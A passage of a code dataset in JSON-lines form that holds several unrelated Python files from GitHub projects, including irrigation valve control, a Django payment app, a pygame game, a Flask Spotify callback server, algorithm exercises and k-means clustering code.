device_map[\"attributes\"],\n \"lastErrorCode\",\n \"last_error_code\",\n )\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]], device_map[\"attributes\"], \"name\"\n )\n self._set_valves_map_value(\n self.valves[device_map[\"id\"]], device_map[\"attributes\"], \"state\"\n )\n\n async def start_seconds_to_override(self, duration, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"START_SECONDS_TO_OVERRIDE\", \"seconds\": duration},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n\n async def stop_until_next_task(self, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"STOP_UNTIL_NEXT_TASK\"},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n\n async def pause(self, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"PAUSE\"},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n\n async def unpause(self, valve_id):\n data = {\n \"id\": str(uuid.uuid1()),\n \"type\": \"VALVE_CONTROL\",\n \"attributes\": {\"command\": \"UNPAUSE\"},\n }\n await self.location.smart_system.call_smart_system_service(valve_id, data)\n","repo_name":"py-smart-gardena/py-smart-gardena","sub_path":"src/gardena/devices/smart_irrigation_control.py","file_name":"smart_irrigation_control.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"14507800703","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom .forms import SendMoneyForm, RequestMoneyForm\nfrom register.models import Transaction, User, Request\nfrom rest_framework import status\nimport requests\nfrom currency_conversion.views import CONVERSION_RATES\nfrom currency_conversion.views import get_converted_amount\nfrom django.contrib import messages\nfrom decimal import Decimal\n\nCONVERSION_API_URL = 'http://127.0.0.1:8000/conversion/'\n\n\ndef reset_and_add_balance_to_all_users(base_amount=1000, base_currency='GBP'):\n users = User.objects.filter(is_active=True)\n print(f'{users.count()} active users found')\n\n for user in users:\n print(f'Updating balance for user {user.username}')\n user.balance = 0\n\n if user.currency == base_currency:\n user.balance += base_amount\n else:\n conversion_rate = get_conversion_rate(base_currency, user.currency)\n converted_amount = base_amount * conversion_rate\n user.balance += converted_amount\n print(f'New balance for user {user.username}: {user.balance}')\n user.save()\n\n\n\"\"\"\ndef get_balance(user):\n balance = Decimal('0')\n sent_transactions = user.transactions.all()\n received_transactions = user.received_transactions.all()\n transactions = sent_transactions | received_transactions\n\n print(f'Calculating balance for user {user.username}:') # Debugging: Start of balance calculation\n print(f'Sent transactions count: {sent_transactions.count()}') # Debugging: Sent transactions count\n print(f'Received transactions count: {received_transactions.count()}') # Debugging: Received transactions count\n\n for transaction in transactions:\n if transaction.user == user:\n balance -= transaction.amount\n print(f'Sent transaction: {transaction.amount}, Updated balance: {balance}') # Debugging: Sent transaction and updated balance\n else:\n conversion_rate = get_conversion_rate(transaction.currency, user.currency)\n balance += transaction.amount * conversion_rate\n print(f'Received transaction: {transaction.amount}, Updated balance: {balance}') # Debugging: Received transaction and updated balance\n\n user.balance = balance\n user.save()\n\n print(f'Final balance for user {user.username}: {balance}') # Debugging: Final balance after calculation\n\n return balance\n\n\"\"\"\n\n\ndef make_payment(sender, recipient, amount, currency):\n if not isinstance(sender, User):\n raise ValueError('Sender must be a User object')\n if not isinstance(recipient, User):\n raise ValueError('Recipient must be a User object')\n if not isinstance(amount, (int, float)) or amount <= 0:\n raise ValueError('Amount must be a positive number')\n if not isinstance(currency, str) or len(currency) != 3:\n raise ValueError('Currency must be a 3-letter string code')\n\n sender_currency = sender.currency\n conversion_rates = CONVERSION_RATES.get(sender_currency, {})\n\n converted_amount = get_converted_amount(amount, currency, recipient.currency)\n\n print(f\"Sender initial balance: {sender.balance}\") # Debugging: Print sender's initial balance\n if sender.balance < Decimal(amount): # Convert amount to Decimal\n raise ValueError('Insufficient funds')\n sender.balance -= Decimal(amount) # Convert amount to Decimal\n sender.save()\n print(f\"Sender updated balance: {sender.balance}\") # Debugging: Print sender's updated balance\n\n print(f\"Recipient initial balance: {recipient.balance}\") # Debugging: Print recipient's initial balance\n recipient.balance += Decimal(converted_amount) # Convert converted_amount to Decimal\n recipient.save()\n print(f\"Recipient updated balance: {recipient.balance}\") # Debugging: Print recipient's updated balance\n\n transaction = Transaction(user=sender, recipient=recipient, amount=Decimal(amount), currency=currency) # Convert amount to Decimal\n transaction.save()\n\n\ndef get_conversion_rate(currency1='USD', currency2='EUR', amount_of_currency1='1'):\n allowed_currencies = ['USD', 'EUR', 'GBP']\n if currency1 not in allowed_currencies or currency2 not in allowed_currencies:\n raise ValueError('Invalid currency')\n url = f'{CONVERSION_API_URL}{currency1}/{currency2}/{amount_of_currency1}'\n response = requests.get(url)\n if response.status_code == status.HTTP_200_OK:\n try:\n data = response.json()\n return data['conversion_rate']\n except (ValueError, KeyError) as e:\n print(f'Error decoding JSON response: {e}')\n else:\n print(f'Request failed with status code {response.status_code}: {response.content}')\n raise ValueError('Unable to get conversion rate')\n\n\ndef check_balance(request):\n balance = request.user.balance\n return render(request, 'check_balance.html', {'balance': balance})\n\n\ndef check_transactions(request):\n transactions = Transaction.objects.filter(user=request.user)\n return render(request, 'check_transactions.html', {'transactions': transactions})\n\n\ndef logout_view(request):\n logout(request)\n return redirect('login')\n\n\n@login_required\ndef dashboard(request):\n balance = request.user.balance\n print(f'User: {request.user.username}, Balance: {balance}') # Debugging: Print user's balance\n\n transactions = Transaction.objects.filter(user=request.user)\n\n send_money_form = SendMoneyForm()\n request_money_form = RequestMoneyForm()\n\n money_requests = Request.objects.filter(recipient=request.user)\n\n if request.method == 'POST':\n if 'send_money' in request.POST:\n send_money_form = SendMoneyForm(request.POST)\n if send_money_form.is_valid():\n sender = request.user\n recipient_email = send_money_form.cleaned_data['recipient_email']\n recipient = User.objects.get(email=recipient_email)\n amount = send_money_form.cleaned_data['amount']\n currency = send_money_form.cleaned_data['currency']\n\n if amount <= 0:\n messages.error(request, 'Amount must be a positive number')\n else:\n make_payment(sender, recipient, amount, currency)\n print(\n f'Send Money: Sender: {sender}, Recipient: {recipient}, Amount: {amount}, Currency: {currency}') # Debugging: Print send money info\n return redirect('dashboard')\n\n elif 'request_money' in request.POST:\n request_money_form = RequestMoneyForm(request.POST)\n if request_money_form.is_valid():\n sender_email = request_money_form.cleaned_data['sender_email']\n sender = User.objects.get(email=sender_email)\n recipient = request.user\n amount = request_money_form.cleaned_data['amount']\n currency = request_money_form.cleaned_data['currency']\n message = 'Request for money transfer'\n new_request = Request(user=sender, recipient=recipient, amount=amount, currency=currency,\n message=message)\n new_request.save()\n print(\n f'Request Money: Sender: {sender}, Recipient: {recipient}, Amount: {amount}, Currency: {currency}') # Debugging: Print request money info\n return redirect('dashboard')\n\n elif 'approve_request' in request.POST or 'reject_request' in request.POST:\n request_id = request.POST.get('request_id')\n if request_id:\n money_request = Request.objects.get(id=request_id, recipient=request.user)\n if 'approve_request' in request.POST:\n sender_email = money_request.user.email\n sender = User.objects.get(email=sender_email)\n recipient = request.user\n amount = money_request.amount\n currency = money_request.currency\n make_payment(sender, recipient, amount, currency)\n money_request.status = 'completed'\n money_request.save()\n messages.success(request, 'Money request approved and transaction completed')\n elif 'reject_request' in request.POST:\n money_request.status = 'rejected'\n money_request.save()\n messages.success(request, 'Money request rejected')\n else:\n messages.error(request, 'Invalid action')\n return redirect('dashboard')\n\n context = {\n 'balance': balance,\n 'transactions': transactions,\n 'send_money_form': send_money_form,\n 'request_money_form': request_money_form,\n 'money_requests': money_requests,\n }\n return render(request, 'user_dashboard.html', context)\n","repo_name":"Adikad10/webapps2024","sub_path":"payapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"124370622","text":"# Block Jam By Cass (and a few bits by Tad)\n\n# * Imports\nimport pygame, random, sys, time\n\n# * Quick Info:\n\n# * Notes with # ! are old code\n\n# * I have notated almos all the code and cleaned up ssome of it, I noted out your old collision system and made my own jank as heck one and I have added sprites but still need to figure out how to remove tha enemy in the top left (also the resolution is now 1650x1200)\n# * The game over screen is incomplete and i am still working on it\n\n# * TODO LIST\n# TODO: make game over screen stay open till any key pressed then try again (At end game)\n# TODO: Fix random enemy in top right\n# TODO: Fix enemy not spawning in leftmost column\n# TODO: Make more skins for the game\n\n# * Classes # ? Does this need to be here?\n\n# * Sprites\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.image = pygame.image.load('resources\\player.png')\n\t\tself.rect = self.image.get_rect()\n\tdef update(self, x, y):\n\t\tself.rect.bottomleft = [x, y]\n \nclass Enemy(pygame.sprite.Sprite):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.image = pygame.image.load('resources\\enemy.png')\n\t\tself.rect = self.image.get_rect()\n\tdef update(self, x, y):\n\t\tself.rect.bottomleft = [x, y]\n \n# * Pygame\npygame.init()\n\n# * Screen setup\nWIDTH = 1650\nHEIGHT = 1200\nicon = pygame.image.load('resources/icon.ico')\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n# backGround = pygame.image.load('resources/bg.png')\npygame.display.set_caption('Block Jam')\npygame.display.set_icon(icon)\npygame.mouse.set_visible(False)\n\n# * Colors\nBLUE = (0,0,255)\nRED = (255,0,0)\nGREEN = (0,255,0)\nWHITE = (255,255,255)\nBLACK = (0,0,0)\n\n# * Enemy data\nenemy_size = 50\ngridWidth = WIDTH/enemy_size\nenemy_pos = [random.randint(1, gridWidth-1)*enemy_size, 0]\nenemy_list = [enemy_pos]\nenemy_group = pygame.sprite.Group()\nenemy = Enemy()\nenemy_group.add(enemy)\n\n# * Player data\nplayer_size = 50\nplayer_pos = [(WIDTH/2)-(player_size/2), HEIGHT-(player_size*2)]\nplayer_group = pygame.sprite.Group()\nplayer = Player()\nplayer_group.add(player) \nplayer.update(player_pos[0], player_pos[1])\n\n\n# * Some variables\nSPEED = 5\ngame_over = False\nend_game = False\nscore = 0\nclock = pygame.time.Clock()\nscoreFont = pygame.font.Font(\"resources/font.otf\", 64)\ngameOverFont = pygame.font.Font(\"resources/fontBold.otf\", 96)\n\n\n\n# * Level set\ndef set_level(score, SPEED):\n\tif score < 150:\n\t\tSPEED = 10\n\telif score < 300:\n\t\tSPEED = 15\n\telif score < 600:\n\t\tSPEED = 25\n\telif score < 1200:\n\t\tSPEED = 50\n\telif score < 2400:\n\t\tSPEED = 75\n\telif score < 4800:\n\t\tSPEED = 100\n\treturn SPEED\t\n\n\n# * Enemy functions\ndef drop_enemies(enemy_list):\n\tdelay = random.random()\n\tif len(enemy_list) < 30 and delay < 0.05:\n\t\tx_pos = random.randint(1, gridWidth-1)*enemy_size\n\t\ty_pos = 0\n\t\tenemy_list.append([x_pos, y_pos])\n\t\tenemy = Enemy()\n\t\tenemy_group.add(enemy)\n\n# ! def draw_enemies(enemy_list, enemy_pos):\n# ! \tfor enemy_pos in enemy_list:\n# ! \t\tpygame.draw.rect(screen, RED, (enemy_pos[0], enemy_pos[1], enemy_size, enemy_size))\n\t\t\n\ndef update_enemy_positions(enemy_list, score):\n\tfor idx, enemy_pos in enumerate(enemy_list):\n\t\tif enemy_pos[1] >= 0 and enemy_pos[1] < HEIGHT:\n\t\t\tenemy_pos[1] += SPEED\n\t\t\tenemy.update(enemy_pos[0], enemy_pos[1])\n\t\t\tenemy_group.draw(screen)\n\n\t\telse:\n\t\t\tenemy_list.pop(idx)\t\n\t\t\tscore += 1\n\treturn score\t\t\n\n# * Collision functions\ndef collision_check(enemy_list, player_pos):\n\tfor enemy_pos in enemy_list:\n\t\tif detect_collision(enemy_pos, player_pos):\n\t\t\treturn True\n\treturn False\n\ndef detect_collision(player_pos, enemy_pos):\n\tp_x = player_pos[0]\n\tp_y = player_pos[1]\n\n\te_x = enemy_pos[0]\n\te_y = enemy_pos[1]\n \n\tif (e_x == p_x) or (p_x == e_x):\n\t\tif (e_y == p_y+(2*player_size)) or (p_y+(2*player_size) == e_y) or (e_y == p_y+(1*player_size)) or (p_y+(1*player_size) == e_y):\n\t\t\treturn True\n\treturn False\n\n\t# ! if (e_x >= p_x and e_x < (p_x + player_size)) or (p_x >= e_x and p_x < (e_x + enemy_size)):\n\t# ! \tif (e_y >= p_y and e_y < (p_y + player_size)) or (p_y >= e_y and p_y < (e_y + enemy_size)):\n\t# ! \t\treturn True\n\t# ! return False\t\n\n# * Game loop\nwhile not game_over:\n\n\t# * End game \n\tif end_game:\n\t\ttime.sleep(2.5)\n\t\tgame_over = True\n \n\t# * Exit with cross\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tsys.exit()\t\n\n\t\t# * Movement\n\t\tif event.type == pygame.KEYDOWN:\n\n\t\t\tx = player_pos[0]\n\t\t\ty = player_pos[1] \n\n\t\t\tif event.key == pygame.K_LEFT:\n\t\t\t\tif x < player_size:\n\t\t\t\t\tx = 0\n\t\t\t\telse:\n\t\t\t\t\tx -= player_size\n \n\t\t\telif event.key == pygame.K_RIGHT:\n\t\t\t\tif x > WIDTH-(2*player_size):\n\t\t\t\t\tx = WIDTH-player_size\n\t\t\t\telse:\n\t\t\t\t\tx += player_size\n \n\t\t\telif event.key == pygame.K_a:\n\t\t\t\tif x < player_size:\n\t\t\t\t\tx = 0\n\t\t\t\telse:\n\t\t\t\t\tx -= player_size\n \n\t\t\telif event.key == pygame.K_d:\n\t\t\t\tif x > WIDTH-(2*player_size):\n\t\t\t\t\tx = WIDTH-player_size\n\t\t\t\telse:\n\t\t\t\t\tx += player_size\n \n\t\t\tplayer_pos = [x, y]\n\t\t\tplayer.update(player_pos[0], player_pos[1])\n\n\t# * BG\n\t# screen.blit(backGround, (0, 0))\n\tscreen.fill(BLACK)\n\n\t# * Score\n\tScoreText = \"Score:\" + str(score)\n\tScoreLabel = scoreFont.render(ScoreText, 1, WHITE)\n\tscreen.blit(ScoreLabel, (WIDTH-((WIDTH/2)+125), HEIGHT-1150))\n\tscore = update_enemy_positions(enemy_list, score)\n \n\t# * Speed\n\tSPEED = set_level(score, SPEED)\n\t\n\t# * Draw and drop enemies\n\tdrop_enemies(enemy_list)\n\t# draw_enemies(enemy_list)\n\tdrop_enemies(enemy_list)\n\t# draw_enemies(enemy_list)\n\n \n \t# * Draw player\n\t# ! pygame.draw.rect(screen, BLUE, (player_pos[0], player_pos[1], player_size, player_size))\n\tplayer_group.draw(screen)\n\t\n\t# * Collision check\n\tif collision_check(enemy_list, player_pos):\n\t\tprint(' ')\n\t\tprint('Final score :', score)\n\t\tscreen.fill(BLACK)\n\t\tscreen.blit(ScoreLabel, (WIDTH-((WIDTH/2)+125), HEIGHT-1150))\n\t\tGameOverText = \"Game Over\"\n\t\tGameOverLabel = gameOverFont.render(GameOverText, 1, RED)\n\t\tscreen.blit(GameOverLabel, (WIDTH-((WIDTH/2)+250), HEIGHT-750 ))\n\t\tend_game = True\n\t\n \t# * Clock\n\tclock.tick(50)\n \n\tpygame.display.update()","repo_name":"lavadragon15396/Block-Jam","sub_path":"source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40530190810","text":"def magic_square(n):\n # create \"empty\" n*n matrix\n matrix = []\n for i in range(n):\n line = []\n for j in range(n):\n line.append(None)\n matrix.append(line)\n\n # start the algorithm\n i = 0\n j = n // 2\n matrix[i][j] = 1\n number = 2\n while number <= n**2:\n # get new positions for i and j according to the rules\n i -= 1\n j += 1\n\n # make sure i and j are in valid positions\n if (i < 0) and (j > n - 1):\n # print(\"the new condition\")\n i += 2\n j -= 1\n if i < 0:\n i = n - 1\n if j > n - 1:\n j = 0\n if matrix[i][j]:\n # print(f\"moved i to {i + 2} because {matrix[i][j]} was already there\")\n i += 2\n j -= 1\n\n # position the numbers inside the matrix\n # print(f\"printing {number} to {i, j}\")\n matrix[i][j] = number\n number += 1\n \n return matrix\n\ndef print_matrix(matrix):\n for line in matrix:\n print(line)\n\ntry:\n print_matrix(magic_square(5))\nexcept:\n print(\"fucked up lmao\")\n ","repo_name":"emanuxd11/FP-feup","sub_path":"MT2_prac/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70452445905","text":"import flask\nfrom flask import request\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Must be a dictionary, a String doesn't maintain state\ncode = {}\n\n@app.route('/', methods=['GET'])\ndef testPage():\n return '''\n

Test page

\n '''\n\n@app.route('/callback', methods=['GET'])\ndef spotifyRedirect():\n\n code[\"code\"] = (request.args.get('code'))\n error = request.args.get('error')\n if error != None:\n # CASE: user denied access - return error page\n code[\"code\"] = error\n print(\"received error: \" + code[\"code\"])\n return '''\n

You've denied access to Spotify.

\n

The application will not work if access is not given. \n Please close this webpage and try again.

'''\n\n print(\"received code: \" + code[\"code\"])\n\n return '''\n

Success: Access to Spotify granted.

\n

You can close this webpage and return to the console.

'''\n\n# Send code to Java app\n@app.route('/getcode', methods=['GET'])\ndef getAccessCode():\n accessCode = code[\"code\"]\n print(\"sending code: \" + code[\"code\"])\n code[\"code\"] = \"\"\n return accessCode\n\napp.run(host=\"0.0.0.0\", port=8888)","repo_name":"csavage5/CMPT-383-Project","sub_path":"flaskWebserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27945943035","text":"\"\"\"Given an integer rowIndex, return the rowIndexth (0-indexed) row of the Pascal's triangle.\n\nIn Pascal's triangle, each number is the sum of the two numbers directly above it as shown:\"\"\"\nclass Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n r = [1]\n for i in range(1, rowIndex + 1):\n r.append(r[-1]*(rowIndex - i + 1)/i)\n a = list(map(int, r)) \n return a\n","repo_name":"akshayagunnam/MyPythonJourney","sub_path":"LeetCodeProblems/Problem_119.py","file_name":"Problem_119.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69815134866","text":"def intersetPoint(head1,head2):\n #code here\n cur1 = head1\n cur2 = head2\n if cur1 == None or cur2 == None:\n return -1\n while cur1 != cur2:\n cur1 = cur1.next\n cur2 = cur2.next\n \n # if cur1 == cur2:\n # return cur1.data\n \n if cur1 == None:\n cur1 = head2\n if cur2 == None:\n cur2 = head1\n \n return cur2.data \n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Linked Lists/150.Intersection of Two Linked Lists.py","file_name":"150.Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"28839523441","text":"from sys import stdin\n\n\nclass FenwickTree(object):\n\n def __init__(self, n):\n self._tree = [0]*(n+1)\n self._arr = [0]*(n+1)\n self._n = n\n\n def add(self, index, value):\n index += 1\n pos = index \n diff = value-self._arr[index]\n\n while pos <= self._n:\n self._tree[pos] += diff\n pos += (pos & -pos)\n self._arr[index] = value\n\n def sum(self, index):\n index += 1\n pos = index\n \n _sum = 0\n while pos >= 1:\n _sum += self._tree[pos]\n pos &= (pos-1)\n return _sum\n\n def __str__(self):\n return ' '.join(map(str, self._tree))\n\n\nif __name__ == '__main__':\n readline = stdin.readline\n n, m, k = map(int, readline().split(' '))\n ft = FenwickTree(n)\n for i in range(n):\n ft.add(i, int(readline()))\n\n for i in range(m+k):\n a, b, c = list(map(int, readline().split(' ')))\n\n if a == 1:\n ft.add(b-1, c)\n else:\n print(ft.sum(c-1) - ft.sum(b-2))\n\n","repo_name":"wonjaek36/algorithm_test","sub_path":"baekjoon/2042/2042.py","file_name":"2042.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12195323232","text":"\"\"\"\nclass for processing point data\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom shapely.geometry import MultiPoint\nfrom sklearn.cluster import KMeans\n\n\nclass pointData(object):\n def __init__(self, df=None, xname=\"x\", yname=\"y\"):\n self.df = df\n self.xname = xname\n self.yname = yname\n\n return\n\n def create2dGrid(self, dx, dy, xmin, xmax, ymin, ymax):\n \"\"\"creates a 2d grid\"\"\"\n Nx = int(np.ceil((xmax - xmin) / dx))\n Ny = int(np.ceil((ymax - ymin) / dy))\n\n # grid nodes\n x = np.linspace(xmin, xmax, Nx + 1)\n y = np.linspace(ymin, ymax, Ny + 1)\n setattr(self, self.xname, x)\n setattr(self, self.yname, y)\n\n # cell centers\n x_c = (x[1:] + x[0:-1]) / 2\n y_c = (y[1:] + y[0:-1]) / 2\n setattr(self, self.xname + \"_c\", x_c)\n setattr(self, self.yname + \"_c\", y_c)\n\n def assignDfToGrid(self, binfields=None):\n \"\"\"finds stats within bins. binfield is the field to bin\"\"\"\n\n if binfields is None:\n binfields = []\n\n if hasattr(self, self.xname):\n xedges = getattr(self, self.xname)\n yedges = getattr(self, self.yname)\n\n # initialize\n gridded = {}\n\n for binfield in binfields:\n gridded[binfield] = {}\n stats_list = [\"mean\", \"median\", \"max\", \"min\", \"std\", \"count\"]\n Nx = xedges.size - 1\n Ny = yedges.size - 1\n for stat in stats_list:\n gridded[binfield][stat] = np.zeros((Nx, Ny))\n gridded[binfield][stat][:] = np.nan\n\n # restrict to grid min/max\n df0 = self.df[\n (self.df[self.xname] >= xedges.min())\n & (self.df[self.xname] <= xedges.max())\n ]\n df0 = df0[\n (df0[self.yname] >= yedges.min()) & (df0[self.yname] <= yedges.max())\n ]\n\n # need stats beyond mean, hist2d won't work. Loop over 1 spatial dim,\n # use pandas cut\n for i_x in range(0, Nx):\n\n # find all values within this x\n x1 = xedges[i_x]\n x2 = xedges[i_x + 1]\n df = df0[(df0[self.xname] >= x1) & (df0[self.xname] < x2)]\n\n if len(df) > 0:\n\n # cut and aggregate along y at this x\n bins = pd.cut(\n df[self.yname], yedges, include_lowest=True, right=True\n )\n\n for binfield in binfields:\n aggd = df.groupby(bins)[binfield].agg(stats_list)\n\n # store each stat\n for stat in stats_list:\n gridded[binfield][stat][i_x, :] = aggd[stat]\n\n else:\n print(\"grid contains no data at this x1,x2,i_x:\")\n print([x1, x2, i_x])\n\n if \"max\" in gridded.keys() and \"min\" in gridded.keys():\n gridded[\"span\"] = gridded[\"max\"] - gridded[\"min\"]\n\n gridded[self.xname] = xedges\n gridded[self.yname] = yedges\n gridded[self.xname + \"_c\"] = (xedges[1:] + xedges[0:-1]) / 2.0\n gridded[self.yname + \"_c\"] = (yedges[1:] + yedges[0:-1]) / 2.0\n else:\n print(\"grid required for assignDfToGrid\")\n gridded = None\n\n return gridded\n\n\ndef KmeansSensitivity(max_N, X1, X2, min_N=1):\n \"\"\"iterative Kmeans clustering using clusters 1 through max_N for 2 variables\n\n Parameters\n ----------\n max_N : int\n max number of clusters to use\n X1 : ndarray\n first variable for clustering (assumed to be normalized)\n X2 : type\n second variable for clustering (assumed to be normalized)\n\n Returns\n -------\n dict\n dictionary of results with following keys\n 'clusters' ndarray, the cluster range\n 'inertia' ndarray, inertia value for each clustering\n 'bounds' dict with bounding polygons by cluster, label within cluster\n\n\n Example Usage\n -------------\n results=pdd.KmeansSensitivity(18,X1,X2)\n\n where X1, X2 are normalized observations of the same length\n\n to pull out bounding polygons of a cluster:\n\n results['bounds'][2][0]\n \"\"\"\n\n results = {\"bounds\": {}, \"X1\": X1, \"X2\": X2}\n Xcluster = np.column_stack((X1, X2))\n\n Nclusters = range(min_N, max_N + 1)\n inert = []\n\n for nclust in Nclusters:\n clustering = KMeans(n_clusters=nclust).fit(Xcluster)\n inert.append(clustering.inertia_)\n results[\"bounds\"][nclust] = {}\n\n # find bounding polygon of each cluster\n for lev in np.unique(clustering.labels_):\n x_1 = X1[clustering.labels_ == lev]\n x_2 = X2[clustering.labels_ == lev]\n b = MultiPoint(np.column_stack((x_1, x_2))).convex_hull\n results[\"bounds\"][nclust][lev] = b\n\n results[\"inertia\"] = np.array(inert)\n results[\"clusters\"] = np.array(Nclusters)\n\n return results\n\n\ndef plotKmeansSensitivity(kMeansResults, cmapname=\"hot\", N_best=None):\n \"\"\"builds plots of KmeansSensitivity results\n\n Parameters\n ----------\n kMeansResults : dict\n the dict returned from KmeansSensitivity\n cmapname : string\n name of matplotlib colormap to use (the default is 'hot').\n N_best : int\n if not None, will highlight best_N in inertia plot (the default is None)\n\n Returns\n -------\n fig1,fig2\n figure handles for composite histogram plot and inertia plot\n\n \"\"\"\n fig1 = plt.figure()\n maxClusters = max(kMeansResults[\"clusters\"])\n Ntests = len(kMeansResults[\"clusters\"])\n Ncols = int(np.ceil(maxClusters / 2))\n Ncols = 5 if Ncols > 5 else Ncols\n Nrows = np.ceil(Ntests / (Ncols * 1.0))\n\n X1 = kMeansResults[\"X1\"]\n X2 = kMeansResults[\"X2\"]\n for nclust in kMeansResults[\"clusters\"]:\n ax = plt.subplot(Nrows, Ncols, nclust)\n ax.hist2d(X1, X2, bins=100, density=True, cmap=cmapname)\n for lev in kMeansResults[\"bounds\"][nclust].keys():\n b = kMeansResults[\"bounds\"][nclust][lev]\n ax.plot(b.boundary.xy[0], b.boundary.xy[1], color=\"w\")\n plt.title(str(nclust))\n\n fig2 = plt.figure()\n plt.plot(kMeansResults[\"clusters\"], kMeansResults[\"inertia\"], \"k\", marker=\".\")\n\n if N_best is not None and N_best in kMeansResults[\"clusters\"]:\n inertval = kMeansResults[\"inertia\"][kMeansResults[\"clusters\"] == N_best]\n plt.plot(N_best, inertval, \"r\", marker=\"o\")\n\n plt.xlabel(\"N\")\n plt.ylabel(\"kmeans inertia\")\n return fig1, fig2\n\n\ndef calcKmeans(best_N, X1vals, X2vals):\n def scaleFunc(X_raw):\n return (X_raw - X_raw.min()) / (X_raw.max() - X_raw.min())\n\n def unscaleFunc(Xsc, X_raw):\n return Xsc * (X_raw.max() - X_raw.min()) + X_raw.min()\n\n X1 = scaleFunc(X1vals)\n X2 = scaleFunc(X2vals)\n Xcluster = np.column_stack((X1, X2))\n clustering = KMeans(n_clusters=best_N).fit(Xcluster)\n return {\"X1\": X1, \"X2\": X2, \"clustering\": clustering}\n","repo_name":"chrishavlin/ytgeotools","sub_path":"ytgeotools/point_data.py","file_name":"point_data.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31433033147","text":"from Stackoverflow import SentimentAnalysis as sa\nimport pandas as pd\nimport csv\nfrom datetime import date,datetime\n\n\n# Id\tReputation\tCreationDate\tDisplayName\tLastAccessDate\tWebsiteUrl\tLocation\tAboutMe\tViews\tUpVotes\tDownVotes\tProfileImageUrl\tEmailHash\tAccountId\n\ndef get_user_deatils(file_path, column_name_for_user_id):\n df = pd.read_csv(file_path)\n\n df = df.sort_values(column_name_for_user_id)\n\n user_data = []\n user_data.append(['UserId','name', 'reputation', 'experience', 'upvotes', 'downvotes'])\n today = datetime.today()\n\n for index, row in df.iterrows():\n reputation = row['Reputation']\n\n datetime_object = datetime.strptime(row['CreationDate'], '%y-%m-%d %H:%M')\n experience=(today-datetime_object).days\n\n upvotes = row['UpVotes']\n downvotes = row['DownVotes']\n\n user_data.append([row['Id'],row['DisplayName'],reputation,experience,upvotes,downvotes])\n\n with open('C:/Users/pc/Desktop/FYP data/test_results/sse_results.csv', 'w') as csvFile:\n writer = csv.writer(csvFile)\n for row in user_data:\n writer.writerow(row)\n csvFile.close()\n\n # return user_data\n\n\n# file_path_for_answer_posts='C:/Users/pc/Desktop/FYP/data/user_data.csv'\n# column_name_for_user_id='Id'\n# get_user_years_stovfl(file_path_for_answer_posts,column_name_for_user_id)\n\n# ============================ common method for counting average word counts post,comments user wise =====================================\n\ndef get_tags_user_wise(file_path, column_name_for_user_id,text_column_name):\n df = pd.read_csv(file_path)\n df = df.sort_values(column_name_for_user_id)\n user_data = []\n user_data.append(['UserId','tags'])\n tags=[]\n tag_count=0\n count = 0\n df_line = 0\n for index, row in df.iterrows():\n text =row[text_column_name]\n text = ((((text.replace('<', ' ')).replace('>', '')).lstrip()).rstrip()).split(' ')\n if df_line == 0:\n previous_user = ''\n df_line += 1\n else:\n current_user = row[column_name_for_user_id]\n if previous_user == '' or previous_user == current_user:\n count += 1\n df_line += 1\n for tag in text:\n if tag not in tags:\n tags.append(tag)\n tag_count+=1\n if df_line == len(df.index) or (previous_user != '' and previous_user != current_user):\n user_data.append([previous_user, tags])\n count = 1\n df_line += 1\n tags=[]\n tag_count=0\n for tag in text:\n tags.append(tag)\n tag_count += 1\n\n previous_user = current_user\n return user_data\n","repo_name":"ruchiraPeiris/Starc-Recruiter","sub_path":"Stackoverflow/FeatureExtraction/tec_skills.py","file_name":"tec_skills.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"548828413","text":"# Marc-Olivier Morin (20187831 ) et Tobias Lepoutre (20177637)\n\nimport random\nimport math\n\n# tableau contenant toute les svg des cartes\ncards = ['2C.svg', '2D.svg', '2H.svg', '2S.svg', '3C.svg', '3D.svg', '3H.svg', 